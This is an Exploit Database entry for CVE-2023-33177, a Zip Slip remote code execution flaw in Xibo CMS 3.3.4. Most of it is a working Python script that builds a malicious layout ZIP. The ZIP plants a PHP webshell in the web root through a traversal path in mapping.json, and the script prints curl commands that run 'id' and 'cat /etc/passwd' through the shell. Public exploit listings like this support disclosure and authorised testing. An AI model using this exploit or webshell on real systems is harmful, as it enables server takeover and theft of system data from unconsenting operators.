This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING xibocms 3.3.4 - RCE EDB-ID: 52500 CVE: 2023-33177 EDB Verified: Author: COMPLEXUSPRADA Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-08 Vulnerable App: # Exploit Title: XiboCMS 3.3.4- Remote Code Execution # Google Dork: N/A # Date: 2025-11-18 # Exploit Author: complexusprada # Vendor Homepage: https://xibo.org.uk/ # Software Link: https://github.com/xibosignage/xibo-cms # Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4 # Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4 # CVE: CVE-2023-33177 # GHSA: GHSA-jj27-x85q-crqv # Category: webapps """ # Vulnerability Description: # Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import # functionality. The application fails to properly validate file paths in the mapping.json # file within uploaded ZIP archives, allowing authenticated attackers to write files # outside the intended library directory using path traversal sequences (../../). # This results in arbitrary file upload and remote code execution. # Exploitation Details: # 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure # 2. The mapping.json file contains a path traversal payload (../../web/shell.php) # 3. A PHP webshell is placed at the corresponding path within the ZIP structure # 4. When the layout is imported, Xibo extracts files without proper path validation # 5. The webshell is written to the web root (/var/www/cms/web/shell.php) # 6. Attacker gains remote code execution via the webshell # Vulnerability Chain: # ZIP contains: library/../../web/shell.php # Mapping.json: {"file": "../../web/shell.php", ...} # Xibo reads: library/ + ../../web/shell.php # Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php # Result: /var/www/cms/web/shell.php (webshell in web root!) # Prerequisites: # - Valid Xibo CMS credentials (any authenticated user with layout import permission) # - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4 # Exploitation Steps: # 1. Run this script to generate exploit.zip # 2. Log in to Xibo CMS # 3. Navigate to: Design → Layouts → Import # 4. Upload the generated exploit.zip file # 5. Even if JSON errors occur, the webshell has been written to disk # 6. Access webshell at: http://<target>/shell.php?cmd=<command> # Example: curl 'http://target/shell.php?cmd=id' # Mitigation: # Upgrade to patched versions: # - Xibo CMS 2.3.17+ (for 2.x branch) # - Xibo CMS 3.3.5+ (for 3.x branch) # Disclaimer: # This exploit is provided for educational purposes, authorized penetration testing, # and vulnerability research only. Only use against systems you own or have explicit # written permission to test. """ import zipfile import json import sys def create_exploit(): """Generate the malicious ZIP file for Xibo CMS RCE exploit""" print("[*] Xibo CMS Zip Slip RCE Exploit Generator") print("[*] CVE-2023-33177 - Path Traversal via Layout Import") print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n") # Valid Xibo 3.0 layout structure # This ensures the ZIP passes initial validation checks layout_json = { "layout": "Exploit Layout", "description": "Path Traversal Test", "layoutDefinitions": { "schemaVersion": 3, "width": 1920, "height": 1080, "backgroundColor": "#000000", "backgroundzIndex": 0, "code": "CVE-2023-33177", "actions": [], "regions": [], "drawers": [] } } # Empty playlist - triggers JSON import code path playlist_json = {} # VULNERABILITY: Path traversal in mapping.json # The 'file' field is not properly sanitized before file extraction # Xibo constructs the extraction path as: library/temp/ + file['file'] # Using ../../ allows escaping the library directory mapping_json = [{ "file": "../../web/shell.php", # Path traversal payload "name": "shell.php", "type": "module" }] # Simple PHP webshell for command execution # Accepts commands via GET parameter: ?cmd=<command> webshell = b'<?php system($_GET["cmd"]); ?>' # Create the malicious ZIP file try: with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf: # Add required Xibo layout files zf.writestr('layout.json', json.dumps(layout_json, indent=2)) zf.writestr('playlist.json', json.dumps(playlist_json)) zf.writestr('mapping.json', json.dumps(mapping_json)) # CRITICAL: The file path in the ZIP must match what Xibo expects # Xibo calls: $zip->getStream('library/' . $file['file']) # Therefore we place the file at: library/../../web/shell.php zf.writestr('library/../../web/shell.php', webshell) print("[+] Exploit ZIP created successfully: exploit.zip") print("\n[*] Exploitation Steps:") print(" 1. Log in to Xibo CMS with valid credentials") print(" 2. Navigate to: Design → Layouts → Import") print(" 3. Upload exploit.zip") print(" 4. Ignore any JSON errors (file is already written)") print(" 5. Access webshell: http://<target>/shell.php?cmd=<command>") print("\n[*] Example:") print(" curl 'http://target/shell.php?cmd=id'") print(" curl 'http://target/shell.php?cmd=cat%20/etc/passwd'") print() except Exception as e: print(f"[-] Error creating exploit: {e}", file=sys.stderr) sys.exit(1) if __name__ == "__main__": create_exploit() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.